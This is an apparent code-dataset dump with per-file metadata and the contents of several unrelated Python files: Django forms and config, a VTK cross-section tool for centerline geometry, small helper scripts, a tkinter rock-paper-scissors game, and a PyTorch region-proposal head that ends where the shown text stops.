blob_id
stringlengths 40
40
| directory_id
stringlengths 40
40
| path
stringlengths 3
281
| content_id
stringlengths 40
40
| detected_licenses
listlengths 0
57
| license_type
stringclasses 2
values | repo_name
stringlengths 6
116
| snapshot_id
stringlengths 40
40
| revision_id
stringlengths 40
40
| branch_name
stringclasses 313
values | visit_date
timestamp[us] | revision_date
timestamp[us] | committer_date
timestamp[us] | github_id
int64 18.2k
668M
⌀ | star_events_count
int64 0
102k
| fork_events_count
int64 0
38.2k
| gha_license_id
stringclasses 17
values | gha_event_created_at
timestamp[us] | gha_created_at
timestamp[us] | gha_language
stringclasses 107
values | src_encoding
stringclasses 20
values | language
stringclasses 1
value | is_vendor
bool 2
classes | is_generated
bool 2
classes | length_bytes
int64 4
6.02M
| extension
stringclasses 78
values | content
stringlengths 2
6.02M
| authors
listlengths 1
1
| author
stringlengths 0
175
|
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
7e6634deadde5151e3032fc0bace2907e54744e0
|
d42b771f64bc2185a8c0dca0f5bcfa5a2e13c5ed
|
/_8percent/apps.py
|
c395ac4faf734c040815c756ab4daaf0c83650a0
|
[] |
no_license
|
bgy1060/Daily_Project
|
4b38de59c09f5e3f82211a9860e1f32a8ef46b37
|
bcc955bddd9941f2bc54f7577c26c1ddc6b36a48
|
refs/heads/main
| 2023-05-15T17:26:56.858438
| 2021-06-17T05:59:10
| 2021-06-17T05:59:10
| 353,864,798
| 1
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 93
|
py
|
from django.apps import AppConfig
class _8PercentConfig(AppConfig):
    """Django AppConfig for the '_8percent' app.

    The leading underscore is required because a Python identifier
    cannot begin with a digit.
    """
    name = '_8percent'  # dotted path Django uses to register the app
|
[
"40761315+bgy1060@users.noreply.github.com"
] |
40761315+bgy1060@users.noreply.github.com
|
8d192f51b6018615be9691fcdda1b9d3e669bf1d
|
e60a342f322273d3db5f4ab66f0e1ffffe39de29
|
/parts/zodiac/pyramid/tests/test_security.py
|
7d0ab393b6121ff075581d422024548009af502c
|
[] |
no_license
|
Xoting/GAExotZodiac
|
6b1b1f5356a4a4732da4c122db0f60b3f08ff6c1
|
f60b2b77b47f6181752a98399f6724b1cb47ddaf
|
refs/heads/master
| 2021-01-15T21:45:20.494358
| 2014-01-13T15:29:22
| 2014-01-13T15:29:22
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 81
|
py
|
/home/alex/myenv/zodiac/eggs/pyramid-1.4-py2.7.egg/pyramid/tests/test_security.py
|
[
"alex.palacioslopez@gmail.com"
] |
alex.palacioslopez@gmail.com
|
e1c702b160ba4a1de40e09ddb343fe3c2f08c3f7
|
8b19b224b9a26ebf586e295c61954ffb927f6e04
|
/MUPHY/MAGIC/BACKEND/SCRIPTS/TOOLS/get_xsect2.py
|
aad7b98542b39a06acd098f22067445908a72055
|
[] |
no_license
|
iacs-ac290r-2019/homework
|
5ca12a3e7fa0721e6785ca5a9069037673c3c591
|
7e052a85f97d0496c44b7aea1e5671c982cb064a
|
refs/heads/master
| 2020-04-22T22:27:57.534981
| 2019-05-08T03:52:20
| 2019-05-08T03:52:20
| 170,709,287
| 0
| 0
| null | 2019-04-09T15:37:53
| 2019-02-14T15:01:52
|
Jupyter Notebook
|
UTF-8
|
Python
| false
| false
| 14,105
|
py
|
#!/usr/bin/env python
import os
import re
import sys
import time
import math
import getopt
def usage():
	"""Print command-line usage and option help to stderr.

	NOTE(review): Python 2 print-statement syntax; the whole script
	targets Python 2 (see also ``sys.maxint`` in the main block).
	"""
	print >> sys.stderr, "Usage:",sys.argv[0],"-g stl_file -c vtk_file -s px,py,pz -e px,py,pz -n numcuts [-m]"
	print >> sys.stderr, "Options:"
	print >> sys.stderr, "\t-g stl_file"
	print >> sys.stderr, "\t--geometry stl_file"
	print >> sys.stderr, "\t\tSpecifies the STL file."
	print >> sys.stderr, ""
	print >> sys.stderr, "\t-c vtk_file"
	print >> sys.stderr, "\t--cline vtk_file"
	print >> sys.stderr, "\t\tSpecifies the VTK file containing a centerline for stl_file"
	print >> sys.stderr, "\t\tspecifed with option -g."
	print >> sys.stderr, ""
	print >> sys.stderr, "\t-s px,py,pz"
	print >> sys.stderr, "\t--startp px,py,pz"
	print >> sys.stderr, "\t\tSpecifies the centerline point from which cross sections are cut"
	print >> sys.stderr, ""
	print >> sys.stderr, "\t-e px,py,pz"
	print >> sys.stderr, "\t--endp px,py,pz"
	print >> sys.stderr, "\t\tSpecifies the centerline point to which cross sections are cut"
	print >> sys.stderr, ""
	print >> sys.stderr, "\t-n numcuts"
	print >> sys.stderr, "\t--number px,py,pz"
	print >> sys.stderr, "\t\tSpecifies the number of cross sections cut between the start and"
	print >> sys.stderr, "\t\tend point"
	print >> sys.stderr, ""
	print >> sys.stderr, "\t-m"
	print >> sys.stderr, "\t--smooth"
	print >> sys.stderr, "\t\tSpecifies whether the centerline in vtk_file must be smoothed"
	print >> sys.stderr, "\t\tbefore cuttin the cross sections."
def dist2(n, m):
	"""Squared Euclidean distance between 3-D points n and m."""
	return (n[0]-m[0])**2 + (n[1]-m[1])**2 + (n[2]-m[2])**2

def get_normal(n, m):
	"""Unit vector pointing from n to m, or None if the points coincide."""
	l = math.sqrt(dist2(n, m))
	if math.fabs(l - 0.0) < 1.0E-10:
		return None
	return ((m[0]-n[0])/l, (m[1]-n[1])/l, (m[2]-n[2])/l)

def vec_prod(a, b):
	"""Cross product a x b of two 3-D vectors."""
	return (a[1]*b[2]-a[2]*b[1], a[2]*b[0]-a[0]*b[2], a[0]*b[1]-a[1]*b[0])

def len_vect(a):
	"""Euclidean length of vector a."""
	return math.sqrt(sum(n*n for n in a))

def dSur(v1, v2, v3):
	"""Area of the triangle with vertices v1, v2, v3."""
	v12 = (v2[0] - v1[0], v2[1] - v1[1], v2[2] - v1[2])
	v13 = (v3[0] - v1[0], v3[1] - v1[1], v3[2] - v1[2])
	return len_vect(vec_prod(v12, v13)) / 2.0

def polygon_metrics(points, n):
	"""Return (perimeter, area) of the closed polygon over the first n points.

	points: object exposing GetPoint(i) -> (x, y, z) (e.g. vtkPoints).
	The area is computed by fanning triangles around the vertex centroid.
	"""
	center = [0.0, 0.0, 0.0]
	for i in range(n):
		p = points.GetPoint(i)
		center = [center[k] + p[k] for k in range(3)]
	# List comprehension instead of map(): the result must stay indexable
	# (on Python 3 a map() object is a one-shot iterator).
	center = [c / n for c in center]
	peri = 0.0
	area = 0.0
	for i in range(1, n):
		peri += math.sqrt(math.fabs(dist2(points.GetPoint(i-1), points.GetPoint(i))))
		area += dSur(points.GetPoint(i-1), points.GetPoint(i), center)
	# Bug fix: the closing edge previously added the *squared* distance
	# (math.sqrt was missing, unlike the loop above), inflating the perimeter.
	peri += math.sqrt(math.fabs(dist2(points.GetPoint(n-1), points.GetPoint(0))))
	area += dSur(points.GetPoint(n-1), points.GetPoint(0), center)
	return peri, area
def vect_mean(vlist):
	"""Component-wise mean of a list of 3-D vectors; None for an empty list.

	Returns a plain list so the result is indexable and reusable: the
	original returned map(), which on Python 3 is a one-shot iterator and
	breaks the caller (points.SetPoint needs a real sequence).
	"""
	if not vlist:
		return None
	l = len(vlist)
	acc = (0.0, 0.0, 0.0)
	for v in vlist:
		acc = [a + c for a, c in zip(acc, v)]
	return [a / l for a in acc]
if __name__ == '__main__':
	# CLI driver: parse options, load the centerline, optionally smooth it,
	# then cut CUTNUM evenly spaced cross sections of the STL geometry along
	# the centerline, writing per-section metrics and VTK files.
	STLFNAME = ''
	CLINEFNAME = ''
	STAPOINT = None
	ENDPOINT = None
	CUTNUM = 1
	SMOOTH = False
	SMOOTH_WIDTH = 5
	opts, args = getopt.getopt(sys.argv[1:], "g:c:s:e:n:m", ["geometry=","cline=","startp=","endp=","number=","smooth"])
	if not opts:
		usage()
		sys.exit(1)
	for o, a in opts:
		if o in ("-g", "--geometry"):
			STLFNAME = a
		elif o in ("-c", "--cline"):
			CLINEFNAME = a
		elif o in ("-s", "--startp", "-e", "--endp"):
			# Parse "px,py,pz" into a 3-tuple of floats; empty fragments
			# (e.g. trailing commas) are dropped before conversion.
			point = re.split('[ ]*,[ ]*', a.strip())
			point = filter(lambda x:x, point)
			try:
				point = tuple(float(coo) for coo in point)
			except ValueError:
				print >> sys.stderr, 'Bad point specification:', a, '\n'
				usage()
				sys.exit(1)
			if len(point) != 3:
				print >> sys.stderr, 'Bad number of coordinates for point:', a, '\n'
				usage()
				sys.exit(1)
			if o in ("-s", "--startp"):
				# Rejects a repeated -s/-e option.
				if STAPOINT:
					usage()
					sys.exit(1)
				STAPOINT = point
			else:
				if ENDPOINT:
					usage()
					sys.exit(1)
				ENDPOINT = point
		elif o in ("-n", "--number"):
			CUTNUM = int(a)
		elif o in ("-m", "--smooth"):
			SMOOTH = True
		else:
			usage()
			sys.exit(1)
	if not STLFNAME or not CLINEFNAME:
		print >> sys.stderr, 'Both geometry and centerline file must be specified.'
		usage()
		sys.exit(1)
	if STLFNAME:
		if not os.path.isfile(STLFNAME):
			print >> sys.stderr, 'Cannot find file', STLFNAME
			sys.exit(1)
	if CLINEFNAME:
		if not os.path.isfile(CLINEFNAME):
			print >> sys.stderr, 'Cannot find file', CLINEFNAME
			sys.exit(1)
	if CUTNUM < 1:
		print 'Number of cuts must be > 0!'
		usage()
		sys.exit(1)
	# moved here to pay import latency after parameters checking
	# NOTE(review): 'myvtk' is a project-local wrapper; presumably it
	# exposes the 'vtk' module used below -- verify against the project.
	from myvtk import *
	reader = vtk.vtkPolyDataReader()
	reader.SetFileName(CLINEFNAME)
	reader.Update()
	clinePolyData = reader.GetOutput()
	# we only consider the first VTK_POLY_LINE cell in the file
	line = clinePolyData.GetCell(0)
	if line.GetCellType() != vtk.VTK_POLY_LINE:
		print 'VTK_POLY_LINE expected in file', CLINEFNAME
		sys.exit(1)
	points = line.GetPoints()
	nump = line.GetNumberOfPoints()
	if nump < 2:
		print 'Too few points for center line!'
		sys.exit(1)
	# perform laplacian smooth, if requested
	# Each pass l replaces every point with the mean of its neighbours
	# within a sliding window (pbuf = points behind, nbuf = current+ahead).
	if SMOOTH:
		for l in range(1,SMOOTH_WIDTH):
			pbuf = []
			nbuf = [points.GetPoint(i) for i in range(min(nump, l+1))]
			for pid in range(nump):
				tmp = vect_mean(pbuf + nbuf)
				if len(pbuf) >= l: pbuf.pop(0)
				pbuf += [points.GetPoint(pid)]
				nbuf.pop(0)
				if pid+l+1 < nump: nbuf += [points.GetPoint(pid+l+1)]
				points.SetPoint(pid, tmp)
	# find the points on the CLine that are the nearest to the specified start and end
	startId = 0
	endId = nump-1
	if STAPOINT or ENDPOINT:
		# NOTE(review): sys.maxint is Python 2 only (sys.maxsize on Python 3).
		sDist = sys.maxint
		eDist = sys.maxint
		for pid in range(nump):
			p = points.GetPoint(pid)
			if STAPOINT:
				d2 = dist2(p, STAPOINT)
				if d2 < sDist:
					startId = pid
					sDist = d2
			if ENDPOINT:
				d2 = dist2(p, ENDPOINT)
				if d2 < eDist:
					endId = pid
					eDist = d2
	# the point range in the CLine is [startId,...,endId]
	print 'IDs of starting and ending points:', startId, endId
	incr = 1 if startId < endId else -1
	pIdList = range(startId, endId+incr, incr)
	length = 0.0
	#for pid in pIdList[1:]:
	for i in range(1, len(pIdList)):
		length += math.sqrt(dist2(points.GetPoint(pIdList[i-1]),
		                          points.GetPoint(pIdList[i ])))
	print 'Length of center line section: {0: >8.3f}'.format(length)
	if CUTNUM > 1:
		stepLen = length / (CUTNUM-1)
	else:
		stepLen = 0
	print 'Cuts distance: {0: >8.3f}'.format(stepLen)
	# find cut planes positions
	# Each cut plane is [origin_point, unit_normal] along the centerline.
	cutPlanes = []
	currIdx = 0
	currp = points.GetPoint(pIdList[currIdx])
	nextIdx = 1
	while True: # it happens that clines have first point duplicated...
		n = get_normal(currp, points.GetPoint(pIdList[nextIdx]))
		if n: break
		nextIdx += 1
	cutPlanes.append([currp, n])
	for i in range(CUTNUM-1): # we always start from 0 even if there are initial duplicate points
		# Walk the polyline until the next cut position falls inside the
		# current segment, then interpolate the exact origin point.
		clen = 0.0
		while True:
			nextIdx = currIdx+1
			nextp = points.GetPoint(pIdList[nextIdx])
			d = math.sqrt(dist2(currp, nextp))
			if (clen + d) > stepLen: break
			if nextIdx == len(pIdList)-1: break
			clen += d
			currIdx = nextIdx
			currp = nextp
		dl = stepLen-clen
		ratio = dl/d
		#print '\tCurrent polyline length:', clen+dl
		#print '\tCurrent polyline segment:', pIdList[currIdx], pIdList[nextIdx]
		p = tuple([currp[0] + ratio*(nextp[0]-currp[0]),
		           currp[1] + ratio*(nextp[1]-currp[1]),
		           currp[2] + ratio*(nextp[2]-currp[2])])
		cutPlanes.append([p, get_normal(currp, nextp)])
		currp = p
	stl = vtk.vtkSTLReader()
	stl.SetFileName(STLFNAME)
	pdw = vtk.vtkPolyDataWriter()
	# NOTE(review): fsection is never closed explicitly; output relies on
	# interpreter exit flushing the file.
	fsection = open('sections.dat','w')
	for i in range(len(cutPlanes)):
		p, n = cutPlanes[i]
		#print 'Cross section {0}: position {1: >8.3f} {2: >8.3f} {3: >8.3f}'.format(i, p[0], p[1], p[2])
		#print 'Cross section {0}: normal   {1: >8.3f} {2: >8.3f} {3: >8.3f}'.format(i, n[0], n[1], n[2])
		# Cut the STL with the plane, then stitch the cut edges into strips.
		plane = vtk.vtkPlane()
		plane.SetOrigin(p)
		plane.SetNormal(n)
		cutEdges = vtk.vtkCutter()
		cutEdges.SetInputConnection(stl.GetOutputPort())
		cutEdges.SetCutFunction(plane)
		#cutEdges.GenerateCutScalarsOn()
		#cutEdges.SetValue(0, 0.0)
		cutStrips = vtk.vtkStripper()
		cutStrips.SetInputConnection(cutEdges.GetOutputPort())
		cutStrips.Update()
		#cutPoly = vtk.vtkPolyData()
		#cutPoly.SetPoints(cutStrips.GetOutput().GetPoints())
		#cutPoly.SetLines(cutStrips.GetOutput().GetLines())
		cutPoly = vtk.vtkPolyData()
		cutPoly.SetPoints(cutStrips.GetOutput().GetPoints())
		cutPoly.SetLines(cutStrips.GetOutput().GetLines())
		# Keep only the connected region closest to the plane origin (a cut
		# through a branching geometry can yield several closed loops).
		conn = vtk.vtkPolyDataConnectivityFilter()
		if vtk.VTK_MAJOR_VERSION <= 5:
			conn.SetInput(cutPoly)
		else:
			conn.SetInputData(cutPoly)
		conn.SetExtractionModeToClosestPointRegion() # extract region nearest to point
		conn.SetClosestPoint(p)
		conn.Update()
		section = conn.GetOutput()
		# compute polygons metrics
		peri, area = polygon_metrics(section.GetCell(0).GetPoints(),
		                             section.GetCell(0).GetNumberOfPoints()-1) # last is the repetition of the first!
		# print 'Cross section {0}: perimeter {1: >8.3f} - area {2: >8.3f} - m.diam {3: >8.3f}'.format(i,
		#                                                                       peri,
		#                                                                       area,
		#                                                                       math.sqrt(area/(math.pi))*2.0)
		print >> fsection, '{0} {1: >8.3f} {2: >8.3f}'.format(i, area, math.sqrt(area/(math.pi))*2.0)
		# write data with only azimutal lines
		# pdw.SetInput(section)
		# pdw.SetFileName('crossSect'+str(i)+'.vtk')
		# pdw.Write()
		# create cells with triangular cells
		merge = vtk.vtkAppendPolyData()
		center = vtk.vtkPolyData()
		cc = vtk.vtkPoints()
		cc.InsertNextPoint(p) # insert center
		center.SetPoints(cc)
		if vtk.VTK_MAJOR_VERSION <= 5:
			merge.AddInput(center)
			merge.AddInput(section)
		else:
			merge.AddInputData(center)
			merge.AddInputData(section)
		merge.Update()
		merge.GetOutput().DeleteCells()
		segmCells = vtk.vtkCellArray()
		line = vtk.vtkLine()
		nump = section.GetNumberOfPoints()
		SHOWTRIANGLES=False
		for k in range(1,nump+1):
			if SHOWTRIANGLES:
				t = vtk.vtkTriangle()
				t.GetPointIds().SetId(0,0)
				t.GetPointIds().SetId(1,k)
				t.GetPointIds().SetId(2,k%nump+1)
				segmCells.InsertNextCell(t)
			else:
				line.GetPointIds().SetId(0,k)
				line.GetPointIds().SetId(1,k%nump+1)
				segmCells.InsertNextCell(line)
		merge.GetOutput().SetLines(segmCells)
		# print '# of Cells:',merge.GetOutput().GetNumberOfCells()
		# Attach the computed metrics as field data on the output polydata.
		field = vtk.vtkFieldData()
		field.SetNumberOfTuples(3)
		val = vtk.vtkFloatArray()
		val.SetName("area")
		val.InsertNextValue(area)
		field.AddArray(val)
		val = vtk.vtkFloatArray()
		val.SetName("mean_diameter")
		val.InsertNextValue( 2.0 * math.sqrt(area/math.pi) )
		field.AddArray(val)
		val = vtk.vtkFloatArray()
		val.SetName("perimeter")
		val.InsertNextValue(peri)
		field.AddArray(val)
		merge.GetOutput().SetFieldData(field)
		merge.Update()
		if vtk.VTK_MAJOR_VERSION <= 5:
			pdw.SetInput(merge.GetOutput())
		else:
			pdw.SetInputData(merge.GetOutput())
		# Zero-pad the section index to three digits for the file name.
		if i<10:
			pad = '00'+str(i)
		elif i<100:
			pad = '0'+str(i)
		elif i<1000:
			pad = str(i)
		else:
			pad = 'XXX'+str(i)
		pdw.SetFileName('crossSect'+pad+'.vtk')
		pdw.Write()
	## uncomment the block below to write cut normals in a vtk file
	## for review
	#wpoints = vtk.vtkPoints()
	#for p in cutPlanes:
	#    wpoints.InsertNextPoint(p[0])
	#    # to visualize normals add a point along them
	#    q = [p[0][0]+p[1][0], p[0][1]+p[1][1], p[0][2]+p[1][2]]
	#    wpoints.InsertNextPoint(q)
	#
	#polydata = vtk.vtkPolyData()
	#polydata.SetPoints(wpoints)
	#
	#segmCells = vtk.vtkCellArray()
	#for i in range(len(cutPlanes)):
	#    line = vtk.vtkLine()
	#    line.GetPointIds().SetId(0,2*i)
	#    line.GetPointIds().SetId(1,2*i+1)
	#    segmCells.InsertNextCell(line)
	#
	#polydata.SetLines(segmCells)
	#
	#pdw.SetInput(polydata)
	#pdw.SetFileName('cut_normals.vtk')
	#pdw.Write()
|
[
"michael.s.emanuel@gmail.com"
] |
michael.s.emanuel@gmail.com
|
a664e5a4d0fb25c64e03f767dde78f345b5a7f67
|
65f2846b1ad9deb0cc3c76c38e8ecaedc21d804e
|
/peek.py
|
6ff1c48b701b02de1bbc7ea81540b08e48386b60
|
[] |
no_license
|
tpyle/pyfunctions
|
95debb8af87198e4f3a0720d7d066f9513b3299e
|
dcde8dd4cc1485a617eb294e52755aefa2a874eb
|
refs/heads/master
| 2020-03-24T05:25:13.916013
| 2019-06-08T20:23:33
| 2019-06-08T20:23:33
| 142,487,455
| 1
| 1
| null | 2019-06-08T20:23:34
| 2018-07-26T19:52:33
|
Python
|
UTF-8
|
Python
| false
| false
| 148
|
py
|
# Reads the next line of a file without 'moving' the cursor
def peek(f):
    """Return the next line of *f* without advancing the read position."""
    bookmark = f.tell()
    upcoming = f.readline()
    f.seek(bookmark)
    return upcoming
|
[
"thomasp162@gmail.com"
] |
thomasp162@gmail.com
|
2392dccc80dacd9deaedbc341bc0121e8881e64d
|
855805c1c246a2d05d789d83da3458062f94e23d
|
/Lab/taller 1/PrimesLessThan.py
|
fa4622d19d06a962d54ff8cd5e9fded1a9d9ba4b
|
[] |
no_license
|
Juanp-BF/JuanPMC
|
47e32abcf83af5bd5fb6fe3b72e4d9d0f1834237
|
9ab65db4729555c5e243de7ea149f142220b5323
|
refs/heads/master
| 2021-08-23T07:01:20.006366
| 2017-12-04T01:15:46
| 2017-12-04T01:15:46
| 107,540,965
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 260
|
py
|
## Sript 2 del taller de Laboratorio
import IsPrime as pri
n = int(input("n = "))
def PrimesLessThan(n):
    """Return the list of integers j with 1 <= j < n for which
    pri.IsPrime(j) == 1, in increasing order."""
    return [j for j in range(1, n) if pri.IsPrime(j) == 1]
print (PrimesLessThan(n))
|
[
"jp.barrero10@unaindes.edu.co"
] |
jp.barrero10@unaindes.edu.co
|
848f6eb93120d4e255b540a17c2a3762b9c4cd03
|
127525c61d9f4b4f6a69998a07d058e2e53505e2
|
/index/forms.py
|
bb09938d4585eaf5d593292b2ad3e9a8aebaf2f4
|
[] |
no_license
|
Oluwatobi17/spud
|
c742b772282188866b4d158fe950ba2389f22443
|
7d4dd81f32c1352dc6b41a9f4c88cc881a888878
|
refs/heads/master
| 2022-12-14T19:24:23.765046
| 2020-07-26T22:21:21
| 2020-07-26T22:21:21
| 293,567,613
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 529
|
py
|
from django import forms
from .models import User, Commodity, Cart
class UserForm(forms.ModelForm):
    """Registration form for the local User model."""
    # Override so the password renders as <input type="password">.
    password = forms.CharField(widget=forms.PasswordInput)
    class Meta:
        model = User
        fields = ['username', 'first_name', 'last_name','email', 'password']
class CheckoutForm(forms.ModelForm):
    """Checkout/delivery details bound to the Cart model."""
    class Meta:
        model = Cart
        fields = ['user','name', 'address','town', 'phoneno', 'email']
class UserUpdateForm(forms.ModelForm):
    """Profile-edit form for the local User model.

    NOTE(review): 'address' and 'phoneno' are not fields of Django's stock
    auth User -- presumably .models.User is a custom model; verify there.
    """
    class Meta:
        model = User
        fields = ['first_name','last_name', 'address', 'phoneno', 'email']
|
[
"ganiuolalekan2000@yahoo.com"
] |
ganiuolalekan2000@yahoo.com
|
97b1215057e7a75ddc92b8f5f933bb8ee03b0733
|
23adf40a6ec7e99634053c6eb24c59fd3be4cacd
|
/Project_3.py
|
fc3c4d80837f59b8ad07c7b5648dd22578a1df1d
|
[] |
no_license
|
fyiidk/ITT109-GROUP_ASSIGNMENT
|
07164611168347d4b1029eed33aa447c7a190afb
|
286fd86532dcbaa42ee40f73ccb6a030fbfad468
|
refs/heads/master
| 2020-05-06T15:35:59.914433
| 2019-04-08T16:38:26
| 2019-04-08T16:38:26
| 180,198,546
| 0
| 0
| null | 2019-04-08T17:23:02
| 2019-04-08T17:23:02
| null |
UTF-8
|
Python
| false
| false
| 2,477
|
py
|
#! /usr/bin/python
from tkinter import *
from random import randint
#main function for determaining wins, loses and draws.
def play(event):
	"""Play one round of rock-paper-scissors against the computer.

	Reads the player's pick from the module-level ``player_choice``
	StringVar, draws a random computer pick, displays the outcome in
	``sideframe`` and returns it ("Draw", "Computer Wins" or "Player Wins").
	"""
	# (The unused PhotoImage loads were removed: they were never displayed
	# and would crash the handler if the .png files were missing.)
	output = Label(sideframe, pady=10)
	output.grid(column=1, row=1)
	human_choice = player_choice.get()
	actions = ["Scissors","Rock","Paper"]
	computer_choice = actions[randint(0,2)]
	print(f"Computer: {computer_choice}")
	print(f"Player: {human_choice}")
	# Bug fix: the original compared the StringVar object itself
	# (player_choice) to strings -- always False -- and placed each
	# output.config() after a return, making it unreachable.
	if human_choice == computer_choice:
		result = "Draw"
	elif (human_choice, computer_choice) in (
			("Rock", "Paper"), ("Paper", "Scissors"), ("Scissors", "Rock")):
		result = "Computer Wins"
	else:
		result = "Player Wins"
	output.config(text=result)
	return result
#Makes a window to place things inside of :3
window = Tk()
window.title("Rock, Paper, Scissors")
window.geometry("300x300")
#creates the frame in which the player will interact with.
mainframe = Frame(window, padx=20, pady=12)
mainframe.grid(column=0, row = 0, sticky=(N,W,E,S))
mainframe.columnconfigure(0, weight=1)
mainframe.rowconfigure(0,weight=1)
#creates frame where output will be placed. (not finished)
sideframe = Frame(window, padx=20, pady=12)
sideframe.grid(column=1, row = 0, sticky=(N,W,E,S))
sideframe.columnconfigure(0, weight=1)
sideframe.rowconfigure(0,weight=1)
#player variable.
# Holds the currently selected radio-button value ("Rock"/"Paper"/"Scissors").
player_choice = StringVar()
#creates buttons that player will interact with.
rock_radiobutton = Radiobutton(mainframe, pady=10, text ='Rock', variable = player_choice, value = "Rock")
rock_radiobutton.grid(column=1, row=2, sticky=W)
paper_radiobutton = Radiobutton(mainframe, pady=10 ,text ='Paper', variable = player_choice, value = "Paper")
paper_radiobutton.grid(column=1, row=3, sticky=W)
scissors_radiobutton = Radiobutton(mainframe, pady= 10,text ='Scissors', variable = player_choice, value = "Scissors")
scissors_radiobutton.grid(column=1, row=4, sticky=W)
# Left-click on the submit button triggers one round via play().
submit_button = Button(mainframe, pady=10, text="Submit", width=3, height=1)
submit_button.bind("<Button-1>", play)
submit_button.grid(column=1, row=6, sticky=W)
#Keeps window from closing, DO NOT REMOVE.
window.mainloop()
|
[
"noreply@github.com"
] |
noreply@github.com
|
44c52c00ce7f7050f6e5be57b23b40089305b112
|
662c9b1dd64fc87a17e62ccab8a1b3b3f58604e8
|
/Reference Code/lib/modeling/rpn_heads_panet.py
|
8e36ec0d7637b94bb760f8316be5600438387de1
|
[
"MIT"
] |
permissive
|
lixiang95/Amodal-Instance-Segmentation-through-KINS-Dataset
|
004daf92dc5a16ff0902b19102dec8d7299a1884
|
052a548c585ddc60ff5188cfe2345343903daf73
|
refs/heads/master
| 2022-04-05T02:43:25.683524
| 2020-02-16T12:09:42
| 2020-02-16T12:09:42
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 6,531
|
py
|
from torch import nn
from torch.nn import init
import torch.nn.functional as F
from core.config import cfg
from modeling.generate_anchors import generate_anchors
from modeling.generate_proposals import GenerateProposalsOp
from modeling.generate_proposal_labels import GenerateProposalLabelsOp
import modeling.FPN_PANET1_v2_2_v1 as FPN
import utils.net as net_utils
# ---------------------------------------------------------------------------- #
# RPN and Faster R-CNN outputs and losses
# ---------------------------------------------------------------------------- #
def generic_rpn_outputs(dim_in, spatial_scale_in):
    """Add RPN outputs (objectness classification and bounding box regression)
    to an RPN model. Abstracts away the use of FPN.
    """
    if cfg.FPN.FPN_ON:
        # FPN enabled: the FPN module builds the multi-scale RPN head.
        return FPN.fpn_rpn_outputs(dim_in, spatial_scale_in)
    # No FPN: attach a plain single-scale RPN head.
    return single_scale_rpn_outputs(dim_in, spatial_scale_in)
def generic_rpn_losses(*inputs, **kwargs):
    """Add RPN losses. Abstracts away the use of FPN."""
    loss_fn = FPN.fpn_rpn_losses if cfg.FPN.FPN_ON else single_scale_rpn_losses
    return loss_fn(*inputs, **kwargs)
class single_scale_rpn_outputs(nn.Module):
    """Add RPN outputs to a single scale model (i.e., no FPN)."""
    def __init__(self, dim_in, spatial_scale):
        super().__init__()
        self.dim_in = dim_in
        self.dim_out = dim_in if cfg.RPN.OUT_DIM_AS_IN_DIM else cfg.RPN.OUT_DIM
        # Anchor grid for this feature map; stride is the inverse of the
        # backbone's spatial scale.
        anchors = generate_anchors(
            stride=1. / spatial_scale,
            sizes=cfg.RPN.SIZES,
            aspect_ratios=cfg.RPN.ASPECT_RATIOS)
        num_anchors = anchors.shape[0]
        # RPN hidden representation
        self.RPN_conv = nn.Conv2d(self.dim_in, self.dim_out, 3, 1, 1)
        # Proposal classification scores
        # softmax mode emits 2 logits (bg/fg) per anchor; sigmoid mode one.
        self.n_score_out = num_anchors * 2 if cfg.RPN.CLS_ACTIVATION == 'softmax' \
            else num_anchors
        self.RPN_cls_score = nn.Conv2d(self.dim_out, self.n_score_out, 1, 1, 0)
        # Proposal bbox regression deltas
        self.RPN_bbox_pred = nn.Conv2d(self.dim_out, num_anchors * 4, 1, 1, 0)
        self.RPN_GenerateProposals = GenerateProposalsOp(anchors, spatial_scale)
        self.RPN_GenerateProposalLabels = GenerateProposalLabelsOp()
        self._init_weights()
    def _init_weights(self):
        # Detectron-style init: small gaussian weights, zero biases.
        init.normal_(self.RPN_conv.weight, std=0.01)
        init.constant_(self.RPN_conv.bias, 0)
        init.normal_(self.RPN_cls_score.weight, std=0.01)
        init.constant_(self.RPN_cls_score.bias, 0)
        init.normal_(self.RPN_bbox_pred.weight, std=0.01)
        init.constant_(self.RPN_bbox_pred.bias, 0)
    def detectron_weight_mapping(self):
        # Map this module's parameter names to Caffe2/Detectron blob names
        # so pretrained Detectron checkpoints can be loaded.
        detectron_weight_mapping = {
            'RPN_conv.weight': 'conv_rpn_w',
            'RPN_conv.bias': 'conv_rpn_b',
            'RPN_cls_score.weight': 'rpn_cls_logits_w',
            'RPN_cls_score.bias': 'rpn_cls_logits_b',
            'RPN_bbox_pred.weight': 'rpn_bbox_pred_w',
            'RPN_bbox_pred.bias': 'rpn_bbox_pred_b'
        }
        orphan_in_detectron = []
        return detectron_weight_mapping, orphan_in_detectron
    def forward(self, x, im_info, roidb=None):
        """
        x: feature maps from the backbone network. (Variable)
        im_info: (CPU Variable)
        roidb: (list of ndarray)

        Returns a dict with 'rpn_cls_logits' and 'rpn_bbox_pred', plus
        'rpn_rois'/'rpn_roi_probs' (and training blobs or 'rois') when
        proposals are generated.
        """
        rpn_conv = F.relu(self.RPN_conv(x), inplace=True)
        rpn_cls_logits = self.RPN_cls_score(rpn_conv)
        rpn_bbox_pred = self.RPN_bbox_pred(rpn_conv)
        return_dict = {
            'rpn_cls_logits': rpn_cls_logits, 'rpn_bbox_pred': rpn_bbox_pred}
        if not self.training or cfg.MODEL.FASTER_RCNN:
            # Proposals are needed during:
            #  1) inference (== not model.train) for RPN only and Faster R-CNN
            #  OR
            #  2) training for Faster R-CNN
            # Otherwise (== training for RPN only), proposals are not needed
            if cfg.RPN.CLS_ACTIVATION == 'softmax':
                # Softmax over the 2-way (bg/fg) axis, keep the fg probability.
                B, C, H, W = rpn_cls_logits.size()
                rpn_cls_prob = F.softmax(
                    rpn_cls_logits.view(B, 2, C // 2, H, W), dim=1)
                rpn_cls_prob = rpn_cls_prob[:, 1].squeeze(dim=1)
            else:
                rpn_cls_prob = F.sigmoid(rpn_cls_logits)
            rpn_rois, rpn_rois_prob = self.RPN_GenerateProposals(
                rpn_cls_prob, rpn_bbox_pred, im_info)
            return_dict['rpn_rois'] = rpn_rois
            return_dict['rpn_roi_probs'] = rpn_rois_prob
            if cfg.MODEL.FASTER_RCNN :
                if self.training:
